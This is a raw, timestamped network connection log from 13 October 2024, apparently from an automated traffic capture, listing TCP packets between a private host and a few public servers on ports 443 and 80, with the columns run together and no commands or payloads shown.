                                                  Oct 13, 2024 19:34:26.605416059 CEST4434985713.107.246.45192.168.2.4
                                                  Oct 13, 2024 19:34:26.605432987 CEST49857443192.168.2.413.107.246.45
                                                  Oct 13, 2024 19:34:26.605438948 CEST4434985713.107.246.45192.168.2.4
                                                  Oct 13, 2024 19:34:26.608724117 CEST49862443192.168.2.413.107.246.45
                                                  Oct 13, 2024 19:34:26.608798981 CEST4434986213.107.246.45192.168.2.4
                                                  Oct 13, 2024 19:34:26.609006882 CEST49862443192.168.2.413.107.246.45
                                                  Oct 13, 2024 19:34:26.609258890 CEST49862443192.168.2.413.107.246.45
                                                  Oct 13, 2024 19:34:26.609296083 CEST4434986213.107.246.45192.168.2.4
                                                  Oct 13, 2024 19:34:26.609927893 CEST804972493.184.221.240192.168.2.4
                                                  Oct 13, 2024 19:34:26.609992027 CEST4972480192.168.2.493.184.221.240
                                                  Oct 13, 2024 19:34:26.799226046 CEST49863443192.168.2.4172.217.18.4
                                                  Oct 13, 2024 19:34:26.799283981 CEST44349863172.217.18.4192.168.2.4
                                                  Oct 13, 2024 19:34:26.799365044 CEST49863443192.168.2.4172.217.18.4
                                                  Oct 13, 2024 19:34:26.799684048 CEST49863443192.168.2.4172.217.18.4
                                                  Oct 13, 2024 19:34:26.799701929 CEST44349863172.217.18.4192.168.2.4
                                                  Oct 13, 2024 19:34:26.907075882 CEST4434986013.107.246.45192.168.2.4
                                                  Oct 13, 2024 19:34:26.907747984 CEST49860443192.168.2.413.107.246.45
                                                  Oct 13, 2024 19:34:26.907767057 CEST4434986013.107.246.45192.168.2.4
                                                  Oct 13, 2024 19:34:26.908539057 CEST49860443192.168.2.413.107.246.45
                                                  Oct 13, 2024 19:34:26.908545017 CEST4434986013.107.246.45192.168.2.4
                                                  Oct 13, 2024 19:34:26.917785883 CEST4434986113.107.246.45192.168.2.4
                                                  Oct 13, 2024 19:34:26.918291092 CEST49861443192.168.2.413.107.246.45
                                                  Oct 13, 2024 19:34:26.918313980 CEST4434986113.107.246.45192.168.2.4
                                                  Oct 13, 2024 19:34:26.918883085 CEST49861443192.168.2.413.107.246.45
                                                  Oct 13, 2024 19:34:26.918890953 CEST4434986113.107.246.45192.168.2.4
                                                  Oct 13, 2024 19:34:26.932404041 CEST4434985813.107.246.45192.168.2.4
                                                  Oct 13, 2024 19:34:26.932785988 CEST49858443192.168.2.413.107.246.45
                                                  Oct 13, 2024 19:34:26.932811975 CEST4434985813.107.246.45192.168.2.4
                                                  Oct 13, 2024 19:34:26.933370113 CEST49858443192.168.2.413.107.246.45
                                                  Oct 13, 2024 19:34:26.933374882 CEST4434985813.107.246.45192.168.2.4
                                                  Oct 13, 2024 19:34:26.938209057 CEST4434985913.107.246.45192.168.2.4
                                                  Oct 13, 2024 19:34:26.938599110 CEST49859443192.168.2.413.107.246.45
                                                  Oct 13, 2024 19:34:26.938610077 CEST4434985913.107.246.45192.168.2.4
                                                  Oct 13, 2024 19:34:26.939167976 CEST49859443192.168.2.413.107.246.45
                                                  Oct 13, 2024 19:34:26.939179897 CEST4434985913.107.246.45192.168.2.4
                                                  Oct 13, 2024 19:34:27.007112026 CEST4434986013.107.246.45192.168.2.4
                                                  Oct 13, 2024 19:34:27.007327080 CEST4434986013.107.246.45192.168.2.4
                                                  Oct 13, 2024 19:34:27.007411957 CEST49860443192.168.2.413.107.246.45
                                                  Oct 13, 2024 19:34:27.007550955 CEST49860443192.168.2.413.107.246.45
                                                  Oct 13, 2024 19:34:27.007567883 CEST4434986013.107.246.45192.168.2.4
                                                  Oct 13, 2024 19:34:27.007649899 CEST49860443192.168.2.413.107.246.45
                                                  Oct 13, 2024 19:34:27.007656097 CEST4434986013.107.246.45192.168.2.4
                                                  Oct 13, 2024 19:34:27.011879921 CEST49864443192.168.2.413.107.246.45
                                                  Oct 13, 2024 19:34:27.012002945 CEST4434986413.107.246.45192.168.2.4
                                                  Oct 13, 2024 19:34:27.012103081 CEST49864443192.168.2.413.107.246.45
                                                  Oct 13, 2024 19:34:27.012397051 CEST49864443192.168.2.413.107.246.45
                                                  Oct 13, 2024 19:34:27.012433052 CEST4434986413.107.246.45192.168.2.4
                                                  Oct 13, 2024 19:34:27.020155907 CEST4434986113.107.246.45192.168.2.4
                                                  Oct 13, 2024 19:34:27.020231009 CEST4434986113.107.246.45192.168.2.4
                                                  Oct 13, 2024 19:34:27.020479918 CEST49861443192.168.2.413.107.246.45
                                                  Oct 13, 2024 19:34:27.020626068 CEST49861443192.168.2.413.107.246.45
                                                  Oct 13, 2024 19:34:27.020626068 CEST49861443192.168.2.413.107.246.45
                                                  Oct 13, 2024 19:34:27.020673990 CEST4434986113.107.246.45192.168.2.4
                                                  Oct 13, 2024 19:34:27.020699978 CEST4434986113.107.246.45192.168.2.4
                                                  Oct 13, 2024 19:34:27.023685932 CEST49865443192.168.2.413.107.246.45
                                                  Oct 13, 2024 19:34:27.023766994 CEST4434986513.107.246.45192.168.2.4
                                                  Oct 13, 2024 19:34:27.023853064 CEST49865443192.168.2.413.107.246.45
                                                  Oct 13, 2024 19:34:27.024112940 CEST49865443192.168.2.413.107.246.45
                                                  Oct 13, 2024 19:34:27.024142981 CEST4434986513.107.246.45192.168.2.4
                                                  Oct 13, 2024 19:34:27.037533045 CEST4434985813.107.246.45192.168.2.4
                                                  Oct 13, 2024 19:34:27.037589073 CEST4434985813.107.246.45192.168.2.4
                                                  Oct 13, 2024 19:34:27.037703991 CEST49858443192.168.2.413.107.246.45
                                                  Oct 13, 2024 19:34:27.037856102 CEST49858443192.168.2.413.107.246.45
                                                  Oct 13, 2024 19:34:27.037874937 CEST4434985813.107.246.45192.168.2.4
                                                  Oct 13, 2024 19:34:27.037884951 CEST49858443192.168.2.413.107.246.45
                                                  Oct 13, 2024 19:34:27.037890911 CEST4434985813.107.246.45192.168.2.4
                                                  Oct 13, 2024 19:34:27.040975094 CEST49866443192.168.2.413.107.246.45
                                                  Oct 13, 2024 19:34:27.041030884 CEST4434986613.107.246.45192.168.2.4
                                                  Oct 13, 2024 19:34:27.041251898 CEST49866443192.168.2.413.107.246.45
                                                  Oct 13, 2024 19:34:27.041477919 CEST49866443192.168.2.413.107.246.45
                                                  Oct 13, 2024 19:34:27.041508913 CEST4434986613.107.246.45192.168.2.4
                                                  Oct 13, 2024 19:34:27.043236017 CEST4434985913.107.246.45192.168.2.4
                                                  Oct 13, 2024 19:34:27.043327093 CEST4434985913.107.246.45192.168.2.4
                                                  Oct 13, 2024 19:34:27.043407917 CEST49859443192.168.2.413.107.246.45
                                                  Oct 13, 2024 19:34:27.043540955 CEST49859443192.168.2.413.107.246.45
                                                  Oct 13, 2024 19:34:27.043540955 CEST49859443192.168.2.413.107.246.45
                                                  Oct 13, 2024 19:34:27.043553114 CEST4434985913.107.246.45192.168.2.4
                                                  Oct 13, 2024 19:34:27.043561935 CEST4434985913.107.246.45192.168.2.4
                                                  Oct 13, 2024 19:34:27.046241045 CEST49867443192.168.2.413.107.246.45
                                                  Oct 13, 2024 19:34:27.046284914 CEST4434986713.107.246.45192.168.2.4
                                                  Oct 13, 2024 19:34:27.046561003 CEST49867443192.168.2.413.107.246.45
                                                  Oct 13, 2024 19:34:27.046789885 CEST49867443192.168.2.413.107.246.45
                                                  Oct 13, 2024 19:34:27.046804905 CEST4434986713.107.246.45192.168.2.4
                                                  Oct 13, 2024 19:34:27.258460999 CEST4434986213.107.246.45192.168.2.4
                                                  Oct 13, 2024 19:34:27.258871078 CEST49862443192.168.2.413.107.246.45
                                                  Oct 13, 2024 19:34:27.258919001 CEST4434986213.107.246.45192.168.2.4
                                                  Oct 13, 2024 19:34:27.259257078 CEST49862443192.168.2.413.107.246.45
                                                  Oct 13, 2024 19:34:27.259263992 CEST4434986213.107.246.45192.168.2.4
                                                  Oct 13, 2024 19:34:27.359441996 CEST4434986213.107.246.45192.168.2.4
                                                  Oct 13, 2024 19:34:27.359523058 CEST4434986213.107.246.45192.168.2.4
                                                  Oct 13, 2024 19:34:27.359596968 CEST49862443192.168.2.413.107.246.45
                                                  Oct 13, 2024 19:34:27.359801054 CEST49862443192.168.2.413.107.246.45
                                                  Oct 13, 2024 19:34:27.359801054 CEST49862443192.168.2.413.107.246.45
                                                  Oct 13, 2024 19:34:27.359849930 CEST4434986213.107.246.45192.168.2.4
                                                  Oct 13, 2024 19:34:27.359878063 CEST4434986213.107.246.45192.168.2.4
                                                  Oct 13, 2024 19:34:27.363260031 CEST49868443192.168.2.413.107.246.45
                                                  Oct 13, 2024 19:34:27.363302946 CEST4434986813.107.246.45192.168.2.4
                                                  Oct 13, 2024 19:34:27.363404036 CEST49868443192.168.2.413.107.246.45
                                                  Oct 13, 2024 19:34:27.363605022 CEST49868443192.168.2.413.107.246.45
                                                  Oct 13, 2024 19:34:27.363620043 CEST4434986813.107.246.45192.168.2.4
                                                  Oct 13, 2024 19:34:27.438153982 CEST44349863172.217.18.4192.168.2.4
                                                  Oct 13, 2024 19:34:27.438486099 CEST49863443192.168.2.4172.217.18.4
                                                  Oct 13, 2024 19:34:27.438524961 CEST44349863172.217.18.4192.168.2.4
                                                  Oct 13, 2024 19:34:27.438808918 CEST44349863172.217.18.4192.168.2.4
                                                  Oct 13, 2024 19:34:27.439240932 CEST49863443192.168.2.4172.217.18.4
                                                  Oct 13, 2024 19:34:27.439294100 CEST44349863172.217.18.4192.168.2.4
                                                  Oct 13, 2024 19:34:27.479175091 CEST49863443192.168.2.4172.217.18.4
                                                  Oct 13, 2024 19:34:27.665568113 CEST4434986413.107.246.45192.168.2.4
                                                  Oct 13, 2024 19:34:27.667402029 CEST49864443192.168.2.413.107.246.45
                                                  Oct 13, 2024 19:34:27.667433023 CEST4434986413.107.246.45192.168.2.4
                                                  Oct 13, 2024 19:34:27.668725014 CEST49864443192.168.2.413.107.246.45
                                                  Oct 13, 2024 19:34:27.668730974 CEST4434986413.107.246.45192.168.2.4
                                                  Oct 13, 2024 19:34:27.686119080 CEST4434986513.107.246.45192.168.2.4
                                                  Oct 13, 2024 19:34:27.686950922 CEST49865443192.168.2.413.107.246.45
                                                  Oct 13, 2024 19:34:27.687016010 CEST4434986513.107.246.45192.168.2.4
                                                  Oct 13, 2024 19:34:27.687762022 CEST49865443192.168.2.413.107.246.45
                                                  Oct 13, 2024 19:34:27.687779903 CEST4434986513.107.246.45192.168.2.4
                                                  Oct 13, 2024 19:34:27.690152884 CEST4434986613.107.246.45192.168.2.4
                                                  Oct 13, 2024 19:34:27.690653086 CEST49866443192.168.2.413.107.246.45
                                                  Oct 13, 2024 19:34:27.690668106 CEST4434986613.107.246.45192.168.2.4
                                                  Oct 13, 2024 19:34:27.691564083 CEST49866443192.168.2.413.107.246.45
                                                  Oct 13, 2024 19:34:27.691574097 CEST4434986613.107.246.45192.168.2.4
                                                  Oct 13, 2024 19:34:27.710942030 CEST4434986713.107.246.45192.168.2.4
                                                  Oct 13, 2024 19:34:27.711566925 CEST49867443192.168.2.413.107.246.45
                                                  Oct 13, 2024 19:34:27.711582899 CEST4434986713.107.246.45192.168.2.4
                                                  Oct 13, 2024 19:34:27.712564945 CEST49867443192.168.2.413.107.246.45
                                                  Oct 13, 2024 19:34:27.712568998 CEST4434986713.107.246.45192.168.2.4
                                                  Oct 13, 2024 19:34:27.767350912 CEST4434986413.107.246.45192.168.2.4
                                                  Oct 13, 2024 19:34:27.767534018 CEST4434986413.107.246.45192.168.2.4
                                                  Oct 13, 2024 19:34:27.767728090 CEST49864443192.168.2.413.107.246.45
                                                  Oct 13, 2024 19:34:27.768064976 CEST49864443192.168.2.413.107.246.45
                                                  Oct 13, 2024 19:34:27.768080950 CEST4434986413.107.246.45192.168.2.4
                                                  Oct 13, 2024 19:34:27.768112898 CEST49864443192.168.2.413.107.246.45
                                                  Oct 13, 2024 19:34:27.768117905 CEST4434986413.107.246.45192.168.2.4
                                                  Oct 13, 2024 19:34:27.776067972 CEST49869443192.168.2.413.107.246.45
                                                  Oct 13, 2024 19:34:27.776128054 CEST4434986913.107.246.45192.168.2.4
                                                  Oct 13, 2024 19:34:27.776201963 CEST49869443192.168.2.413.107.246.45
                                                  Oct 13, 2024 19:34:27.777007103 CEST49869443192.168.2.413.107.246.45
                                                  Oct 13, 2024 19:34:27.777044058 CEST4434986913.107.246.45192.168.2.4
                                                  Oct 13, 2024 19:34:27.789055109 CEST4434986513.107.246.45192.168.2.4
                                                  Oct 13, 2024 19:34:27.789112091 CEST4434986513.107.246.45192.168.2.4
                                                  Oct 13, 2024 19:34:27.789340019 CEST49865443192.168.2.413.107.246.45
                                                  Oct 13, 2024 19:34:27.789509058 CEST49865443192.168.2.413.107.246.45
                                                  Oct 13, 2024 19:34:27.789510012 CEST49865443192.168.2.413.107.246.45
                                                  Oct 13, 2024 19:34:27.789545059 CEST4434986513.107.246.45192.168.2.4
                                                  Oct 13, 2024 19:34:27.789567947 CEST4434986513.107.246.45192.168.2.4
                                                  Oct 13, 2024 19:34:27.791620016 CEST4434986613.107.246.45192.168.2.4
                                                  Oct 13, 2024 19:34:27.791697025 CEST4434986613.107.246.45192.168.2.4
                                                  Oct 13, 2024 19:34:27.792043924 CEST49866443192.168.2.413.107.246.45
                                                  Oct 13, 2024 19:34:27.792274952 CEST49866443192.168.2.413.107.246.45
                                                  Oct 13, 2024 19:34:27.792287111 CEST4434986613.107.246.45192.168.2.4
                                                  Oct 13, 2024 19:34:27.796027899 CEST49870443192.168.2.413.107.246.45
                                                  Oct 13, 2024 19:34:27.796050072 CEST4434987013.107.246.45192.168.2.4
                                                  Oct 13, 2024 19:34:27.796231985 CEST49870443192.168.2.413.107.246.45
                                                  Oct 13, 2024 19:34:27.798208952 CEST49871443192.168.2.413.107.246.45
                                                  Oct 13, 2024 19:34:27.798255920 CEST4434987113.107.246.45192.168.2.4
                                                  Oct 13, 2024 19:34:27.798610926 CEST49871443192.168.2.413.107.246.45
                                                  Oct 13, 2024 19:34:27.798860073 CEST49871443192.168.2.413.107.246.45
                                                  Oct 13, 2024 19:34:27.798877954 CEST4434987113.107.246.45192.168.2.4
                                                  Oct 13, 2024 19:34:27.799000978 CEST49870443192.168.2.413.107.246.45
                                                  Oct 13, 2024 19:34:27.799024105 CEST4434987013.107.246.45192.168.2.4
                                                  Oct 13, 2024 19:34:28.856983900 CEST4434986713.107.246.45192.168.2.4
                                                  Oct 13, 2024 19:34:28.857153893 CEST4434986713.107.246.45192.168.2.4
                                                  Oct 13, 2024 19:34:28.857237101 CEST49867443192.168.2.413.107.246.45
                                                  Oct 13, 2024 19:34:28.857336998 CEST49867443192.168.2.413.107.246.45
                                                  Oct 13, 2024 19:34:28.857337952 CEST49867443192.168.2.413.107.246.45
                                                  Oct 13, 2024 19:34:28.857384920 CEST4434986713.107.246.45192.168.2.4
                                                  Oct 13, 2024 19:34:28.857434988 CEST4434986713.107.246.45192.168.2.4
                                                  Oct 13, 2024 19:34:28.859972954 CEST49872443192.168.2.413.107.246.45
                                                  Oct 13, 2024 19:34:28.860094070 CEST4434987213.107.246.45192.168.2.4
                                                  Oct 13, 2024 19:34:28.860327959 CEST49872443192.168.2.413.107.246.45
                                                  Oct 13, 2024 19:34:28.860594034 CEST49872443192.168.2.413.107.246.45
                                                  Oct 13, 2024 19:34:28.860616922 CEST4434987213.107.246.45192.168.2.4
                                                  Oct 13, 2024 19:34:29.283000946 CEST4434986813.107.246.45192.168.2.4
                                                  Oct 13, 2024 19:34:29.283561945 CEST49868443192.168.2.413.107.246.45
                                                  Oct 13, 2024 19:34:29.283590078 CEST4434986813.107.246.45192.168.2.4
                                                  Oct 13, 2024 19:34:29.284722090 CEST49868443192.168.2.413.107.246.45
                                                  Oct 13, 2024 19:34:29.284729004 CEST4434986813.107.246.45192.168.2.4
                                                  Oct 13, 2024 19:34:29.285655975 CEST4434986913.107.246.45192.168.2.4
                                                  Oct 13, 2024 19:34:29.286046982 CEST49869443192.168.2.413.107.246.45
                                                  Oct 13, 2024 19:34:29.286134005 CEST4434986913.107.246.45192.168.2.4
                                                  Oct 13, 2024 19:34:29.286570072 CEST49869443192.168.2.413.107.246.45
                                                  Oct 13, 2024 19:34:29.286587000 CEST4434986913.107.246.45192.168.2.4
                                                  Oct 13, 2024 19:34:29.400019884 CEST4434986813.107.246.45192.168.2.4
                                                  Oct 13, 2024 19:34:29.400084972 CEST4434986813.107.246.45192.168.2.4
                                                  Oct 13, 2024 19:34:29.400248051 CEST4434986913.107.246.45192.168.2.4
                                                  Oct 13, 2024 19:34:29.400330067 CEST49868443192.168.2.413.107.246.45
                                                  Oct 13, 2024 19:34:29.400389910 CEST4434986913.107.246.45192.168.2.4
                                                  Oct 13, 2024 19:34:29.400787115 CEST49868443192.168.2.413.107.246.45
                                                  Oct 13, 2024 19:34:29.400820017 CEST4434986813.107.246.45192.168.2.4
                                                  Oct 13, 2024 19:34:29.400823116 CEST49869443192.168.2.413.107.246.45
                                                  Oct 13, 2024 19:34:29.403420925 CEST49869443192.168.2.413.107.246.45
                                                  Oct 13, 2024 19:34:29.403470993 CEST4434986913.107.246.45192.168.2.4
                                                  Oct 13, 2024 19:34:29.403501034 CEST49869443192.168.2.413.107.246.45
                                                  Oct 13, 2024 19:34:29.403518915 CEST4434986913.107.246.45192.168.2.4
                                                  Oct 13, 2024 19:34:29.409459114 CEST49873443192.168.2.413.107.246.45
                                                  Oct 13, 2024 19:34:29.409502029 CEST4434987313.107.246.45192.168.2.4
                                                  Oct 13, 2024 19:34:29.409573078 CEST49873443192.168.2.413.107.246.45
                                                  Oct 13, 2024 19:34:29.410892963 CEST49874443192.168.2.413.107.246.45
                                                  Oct 13, 2024 19:34:29.410928965 CEST4434987413.107.246.45192.168.2.4
                                                  Oct 13, 2024 19:34:29.411019087 CEST49874443192.168.2.413.107.246.45
                                                  Oct 13, 2024 19:34:29.411294937 CEST49873443192.168.2.413.107.246.45
                                                  Oct 13, 2024 19:34:29.411309958 CEST4434987313.107.246.45192.168.2.4
                                                  Oct 13, 2024 19:34:29.411626101 CEST49874443192.168.2.413.107.246.45
                                                  Oct 13, 2024 19:34:29.411638975 CEST4434987413.107.246.45192.168.2.4
                                                  Oct 13, 2024 19:34:29.499679089 CEST4434987113.107.246.45192.168.2.4
                                                  Oct 13, 2024 19:34:29.500293016 CEST49871443192.168.2.413.107.246.45
                                                  Oct 13, 2024 19:34:29.500309944 CEST4434987113.107.246.45192.168.2.4
                                                  Oct 13, 2024 19:34:29.501005888 CEST49871443192.168.2.413.107.246.45
                                                  Oct 13, 2024 19:34:29.501013994 CEST4434987113.107.246.45192.168.2.4
                                                  Oct 13, 2024 19:34:29.563939095 CEST4434987013.107.246.45192.168.2.4
                                                  Oct 13, 2024 19:34:29.564636946 CEST49870443192.168.2.413.107.246.45
                                                  Oct 13, 2024 19:34:29.564677954 CEST4434987013.107.246.45192.168.2.4
                                                  Oct 13, 2024 19:34:29.565658092 CEST49870443192.168.2.413.107.246.45
                                                  Oct 13, 2024 19:34:29.565665007 CEST4434987013.107.246.45192.168.2.4
                                                  Oct 13, 2024 19:34:29.601632118 CEST4434987113.107.246.45192.168.2.4
                                                  Oct 13, 2024 19:34:29.601696968 CEST4434987113.107.246.45192.168.2.4
                                                  Oct 13, 2024 19:34:29.601780891 CEST49871443192.168.2.413.107.246.45
                                                  Oct 13, 2024 19:34:29.602233887 CEST49871443192.168.2.413.107.246.45
                                                  Oct 13, 2024 19:34:29.602257013 CEST4434987113.107.246.45192.168.2.4
                                                  Oct 13, 2024 19:34:29.607279062 CEST49875443192.168.2.413.107.246.45
                                                  Oct 13, 2024 19:34:29.607338905 CEST4434987513.107.246.45192.168.2.4
                                                  Oct 13, 2024 19:34:29.607424021 CEST49875443192.168.2.413.107.246.45
                                                  Oct 13, 2024 19:34:29.608333111 CEST49875443192.168.2.413.107.246.45
                                                  Oct 13, 2024 19:34:29.608355999 CEST4434987513.107.246.45192.168.2.4
                                                  Oct 13, 2024 19:34:29.670098066 CEST4434987013.107.246.45192.168.2.4
                                                  Oct 13, 2024 19:34:29.670161009 CEST4434987013.107.246.45192.168.2.4
                                                  Oct 13, 2024 19:34:29.670223951 CEST49870443192.168.2.413.107.246.45
                                                  Oct 13, 2024 19:34:29.670552015 CEST49870443192.168.2.413.107.246.45
                                                  Oct 13, 2024 19:34:29.670586109 CEST4434987013.107.246.45192.168.2.4
                                                  Oct 13, 2024 19:34:29.670608044 CEST49870443192.168.2.413.107.246.45
                                                  Oct 13, 2024 19:34:29.670614958 CEST4434987013.107.246.45192.168.2.4
                                                  Oct 13, 2024 19:34:29.675736904 CEST49876443192.168.2.413.107.246.45
                                                  Oct 13, 2024 19:34:29.675780058 CEST4434987613.107.246.45192.168.2.4
                                                  Oct 13, 2024 19:34:29.675942898 CEST49876443192.168.2.413.107.246.45
                                                  Oct 13, 2024 19:34:29.676229000 CEST49876443192.168.2.413.107.246.45
                                                  Oct 13, 2024 19:34:29.676242113 CEST4434987613.107.246.45192.168.2.4
                                                  Oct 13, 2024 19:34:29.780632973 CEST4434987213.107.246.45192.168.2.4
                                                  Oct 13, 2024 19:34:29.781287909 CEST49872443192.168.2.413.107.246.45
                                                  Oct 13, 2024 19:34:29.781341076 CEST4434987213.107.246.45192.168.2.4
                                                  Oct 13, 2024 19:34:29.781959057 CEST49872443192.168.2.413.107.246.45
                                                  Oct 13, 2024 19:34:29.781972885 CEST4434987213.107.246.45192.168.2.4
                                                  Oct 13, 2024 19:34:29.889141083 CEST4434987213.107.246.45192.168.2.4
                                                  Oct 13, 2024 19:34:29.889283895 CEST4434987213.107.246.45192.168.2.4
                                                  Oct 13, 2024 19:34:29.889344931 CEST49872443192.168.2.413.107.246.45
                                                  Oct 13, 2024 19:34:29.889561892 CEST49872443192.168.2.413.107.246.45
                                                  Oct 13, 2024 19:34:29.889586926 CEST4434987213.107.246.45192.168.2.4
                                                  Oct 13, 2024 19:34:29.895875931 CEST49877443192.168.2.413.107.246.45
                                                  Oct 13, 2024 19:34:29.895910978 CEST4434987713.107.246.45192.168.2.4
                                                  Oct 13, 2024 19:34:29.895994902 CEST49877443192.168.2.413.107.246.45
                                                  Oct 13, 2024 19:34:29.896506071 CEST49877443192.168.2.413.107.246.45
                                                  Oct 13, 2024 19:34:29.896517992 CEST4434987713.107.246.45192.168.2.4
                                                  Oct 13, 2024 19:34:30.065447092 CEST4434987413.107.246.45192.168.2.4
                                                  Oct 13, 2024 19:34:30.069418907 CEST49874443192.168.2.413.107.246.45
                                                  Oct 13, 2024 19:34:30.069448948 CEST4434987413.107.246.45192.168.2.4
                                                  Oct 13, 2024 19:34:30.070302010 CEST49874443192.168.2.413.107.246.45
                                                  Oct 13, 2024 19:34:30.070307970 CEST4434987413.107.246.45192.168.2.4
                                                  Oct 13, 2024 19:34:30.306406021 CEST4434987313.107.246.45192.168.2.4
                                                  Oct 13, 2024 19:34:30.307101011 CEST49873443192.168.2.413.107.246.45
                                                  Oct 13, 2024 19:34:30.307126045 CEST4434987313.107.246.45192.168.2.4
                                                  Oct 13, 2024 19:34:30.307915926 CEST49873443192.168.2.413.107.246.45
                                                  Oct 13, 2024 19:34:30.307920933 CEST4434987313.107.246.45192.168.2.4
                                                  Oct 13, 2024 19:34:30.397265911 CEST4434987413.107.246.45192.168.2.4
                                                  Oct 13, 2024 19:34:30.397305965 CEST4434987413.107.246.45192.168.2.4
                                                  Oct 13, 2024 19:34:30.397361040 CEST49874443192.168.2.413.107.246.45
                                                  Oct 13, 2024 19:34:30.397377968 CEST4434987413.107.246.45192.168.2.4
                                                  Oct 13, 2024 19:34:30.397393942 CEST4434987413.107.246.45192.168.2.4
                                                  Oct 13, 2024 19:34:30.397435904 CEST49874443192.168.2.413.107.246.45
                                                  Oct 13, 2024 19:34:30.397655010 CEST49874443192.168.2.413.107.246.45
                                                  Oct 13, 2024 19:34:30.397672892 CEST4434987413.107.246.45192.168.2.4
                                                  Oct 13, 2024 19:34:30.397682905 CEST49874443192.168.2.413.107.246.45
                                                  Oct 13, 2024 19:34:30.397691011 CEST4434987413.107.246.45192.168.2.4
                                                  Oct 13, 2024 19:34:30.400646925 CEST49878443192.168.2.413.107.246.45
                                                  Oct 13, 2024 19:34:30.400686979 CEST4434987813.107.246.45192.168.2.4
                                                  Oct 13, 2024 19:34:30.400964975 CEST49878443192.168.2.413.107.246.45
                                                  Oct 13, 2024 19:34:30.401230097 CEST49878443192.168.2.413.107.246.45
                                                  Oct 13, 2024 19:34:30.401253939 CEST4434987813.107.246.45192.168.2.4
                                                  Oct 13, 2024 19:34:30.410693884 CEST4434987613.107.246.45192.168.2.4
                                                  Oct 13, 2024 19:34:30.411156893 CEST49876443192.168.2.413.107.246.45
                                                  Oct 13, 2024 19:34:30.411186934 CEST4434987613.107.246.45192.168.2.4
                                                  Oct 13, 2024 19:34:30.411664009 CEST49876443192.168.2.413.107.246.45
                                                  Oct 13, 2024 19:34:30.411672115 CEST4434987613.107.246.45192.168.2.4
                                                  Oct 13, 2024 19:34:30.413531065 CEST4434987313.107.246.45192.168.2.4
                                                  Oct 13, 2024 19:34:30.413589001 CEST4434987313.107.246.45192.168.2.4
                                                  Oct 13, 2024 19:34:30.413650036 CEST49873443192.168.2.413.107.246.45
                                                  Oct 13, 2024 19:34:30.413805008 CEST49873443192.168.2.413.107.246.45
                                                  Oct 13, 2024 19:34:30.413822889 CEST4434987313.107.246.45192.168.2.4
                                                  Oct 13, 2024 19:34:30.413832903 CEST49873443192.168.2.413.107.246.45
                                                  Oct 13, 2024 19:34:30.413839102 CEST4434987313.107.246.45192.168.2.4
                                                  Oct 13, 2024 19:34:30.416728973 CEST49879443192.168.2.413.107.246.45
                                                  Oct 13, 2024 19:34:30.416762114 CEST4434987913.107.246.45192.168.2.4
                                                  Oct 13, 2024 19:34:30.416840076 CEST49879443192.168.2.413.107.246.45
                                                  Oct 13, 2024 19:34:30.417241096 CEST49879443192.168.2.413.107.246.45
                                                  Oct 13, 2024 19:34:30.417254925 CEST4434987913.107.246.45192.168.2.4
                                                  Oct 13, 2024 19:34:30.500152111 CEST4434987513.107.246.45192.168.2.4
                                                  Oct 13, 2024 19:34:30.500781059 CEST49875443192.168.2.413.107.246.45
                                                  Oct 13, 2024 19:34:30.500859976 CEST4434987513.107.246.45192.168.2.4
                                                  Oct 13, 2024 19:34:30.501409054 CEST49875443192.168.2.413.107.246.45
                                                  Oct 13, 2024 19:34:30.501430988 CEST4434987513.107.246.45192.168.2.4
                                                  Oct 13, 2024 19:34:30.518137932 CEST4434987613.107.246.45192.168.2.4
                                                  Oct 13, 2024 19:34:30.518212080 CEST4434987613.107.246.45192.168.2.4
                                                  Oct 13, 2024 19:34:30.518258095 CEST49876443192.168.2.413.107.246.45
                                                  Oct 13, 2024 19:34:30.518567085 CEST49876443192.168.2.413.107.246.45
                                                  Oct 13, 2024 19:34:30.518583059 CEST4434987613.107.246.45192.168.2.4
                                                  Oct 13, 2024 19:34:30.518631935 CEST49876443192.168.2.413.107.246.45
                                                  Oct 13, 2024 19:34:30.518636942 CEST4434987613.107.246.45192.168.2.4
                                                  Oct 13, 2024 19:34:30.521476984 CEST49880443192.168.2.413.107.246.45
                                                  Oct 13, 2024 19:34:30.521581888 CEST4434988013.107.246.45192.168.2.4
                                                  Oct 13, 2024 19:34:30.521725893 CEST49880443192.168.2.413.107.246.45
                                                  Oct 13, 2024 19:34:30.521859884 CEST49880443192.168.2.413.107.246.45
                                                  Oct 13, 2024 19:34:30.521883011 CEST4434988013.107.246.45192.168.2.4
                                                  Oct 13, 2024 19:34:30.590121984 CEST4434987713.107.246.45192.168.2.4
                                                  Oct 13, 2024 19:34:30.590605021 CEST49877443192.168.2.413.107.246.45
                                                  Oct 13, 2024 19:34:30.590620041 CEST4434987713.107.246.45192.168.2.4
                                                  Oct 13, 2024 19:34:30.591131926 CEST49877443192.168.2.413.107.246.45
                                                  Oct 13, 2024 19:34:30.591137886 CEST4434987713.107.246.45192.168.2.4
                                                  Oct 13, 2024 19:34:30.605195045 CEST4434987513.107.246.45192.168.2.4
                                                  Oct 13, 2024 19:34:30.605290890 CEST4434987513.107.246.45192.168.2.4
                                                  Oct 13, 2024 19:34:30.605448961 CEST49875443192.168.2.413.107.246.45
                                                  Oct 13, 2024 19:34:30.605643988 CEST49875443192.168.2.413.107.246.45
                                                  Oct 13, 2024 19:34:30.605690002 CEST4434987513.107.246.45192.168.2.4
                                                  Oct 13, 2024 19:34:30.611829996 CEST49881443192.168.2.413.107.246.45
                                                  Oct 13, 2024 19:34:30.611876965 CEST4434988113.107.246.45192.168.2.4
                                                  Oct 13, 2024 19:34:30.611962080 CEST49881443192.168.2.413.107.246.45
                                                  Oct 13, 2024 19:34:30.614469051 CEST49881443192.168.2.413.107.246.45
                                                  Oct 13, 2024 19:34:30.614484072 CEST4434988113.107.246.45192.168.2.4
                                                  Oct 13, 2024 19:34:30.696374893 CEST4434987713.107.246.45192.168.2.4
                                                  Oct 13, 2024 19:34:30.696433067 CEST4434987713.107.246.45192.168.2.4
                                                  Oct 13, 2024 19:34:30.696564913 CEST4434987713.107.246.45192.168.2.4
                                                  Oct 13, 2024 19:34:30.696567059 CEST49877443192.168.2.413.107.246.45
                                                  Oct 13, 2024 19:34:30.696670055 CEST49877443192.168.2.413.107.246.45
                                                  Oct 13, 2024 19:34:30.697328091 CEST49877443192.168.2.413.107.246.45
                                                  Oct 13, 2024 19:34:30.697346926 CEST4434987713.107.246.45192.168.2.4
                                                  Oct 13, 2024 19:34:30.697417021 CEST49877443192.168.2.413.107.246.45
                                                  Oct 13, 2024 19:34:30.697422981 CEST4434987713.107.246.45192.168.2.4
                                                  Oct 13, 2024 19:34:30.705244064 CEST49882443192.168.2.413.107.246.45
